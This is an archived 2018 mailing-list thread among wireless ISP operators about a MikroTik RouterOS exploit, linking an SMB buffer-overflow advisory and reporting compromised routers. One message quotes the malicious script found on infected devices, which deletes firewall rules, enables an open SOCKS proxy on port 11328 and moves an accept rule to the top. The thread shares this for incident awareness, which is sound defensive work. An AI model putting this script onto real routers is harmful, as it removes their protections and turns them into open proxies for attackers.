Mikrotik themselves also has published several security bulletins on their newsletter list. If your not on it, go to mikrotik.com and scroll to the bottom and sign up for the newsletter.
Brian ________________________________ From: 20153514200n behalf of Sent: Tuesday, August 7, 2018 8:34 AM To: Dennis Burgess; Mikrotik Users Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 How does one subscribe to your news letter? Alex Phillips CEO and General Manager RBNS.net HighSpeedLink.net 540-908-3993 On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users <mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>> wrote: You should subscribe to our newsletters as we mentioned this several weeks ago…. This is the exploit that was fixed back 4 months ago! Lol Dennis Burgess, Mikrotik Certified Trainer Author of "Learn RouterOS- Second Edition” Link Technologies, Inc -- Mikrotik & WISP Support Services Office: 314-735-0270 Website: http://www.linktechs.net<http://www.linktechs.net/> Create Wireless Coverage’s with www.towercoverage.com<http://www.towercoverage.com> From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org>> On Behalf Of Bruce Bridegwater via Mikrotik-users Sent: Sunday, August 5, 2018 8:16 PM To: 'Shawn C. Peppers' <videodirectwispal...@gmail.com<mailto:videodirectwispal...@gmail.com>>; 'Mikrotik Users' <mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>>; Bob Pensworth <beeper.bo...@gmail.com<mailto:beeper.bo...@gmail.com>> Cc: JP Douros <jdou...@rpmcable.com<mailto:jdou...@rpmcable.com>> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to our attention and providing the solution. RPM manages our Cisco UBR10k CMTS. Great support company. ________________________________ From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org>> on behalf of Bob Pensworth via Mikrotik-users <mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>> Sent: Sunday, August 5, 2018 7:57:53 PM To: 'Shawn C. Peppers'; 'Mikrotik Users' Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 We are finding an IP/Socks connection: We are finding an event entry in System/Scheduler And the (below) script in System/Script: /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1; -- Bob Pensworth, WA7BOB | General Manager CresComm WiFi, LLC<http://www.crescommwifi.com/> | (360) 928-0000, x1 From: mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org<mailto:mikrotik-users-boun...@wispa.org>> On Behalf Of Shawn C. Peppers via Mikrotik-users Sent: Friday, March 16, 2018 11:54 AM To: mikrotik-users@wispa.org<mailto:mikrotik-users@wispa.org>; memb...@wisp.org<mailto:memb...@wisp.org> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 I have not tested this yet but.... https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow :: // Shawn Peppers :: // DirectlinkAdmin.com<http://DirectlinkAdmin.com> _______________________________________________ Mikrotik-users mailing list Mikrotik-users@wispa.org<mailto:Mikrotik-users@wispa.org> http://lists.wispa.org/mailman/listinfo/mikrotik-users
_______________________________________________ Mikrotik-users mailing list Mikrotik-users@wispa.org http://lists.wispa.org/mailman/listinfo/mikrotik-users
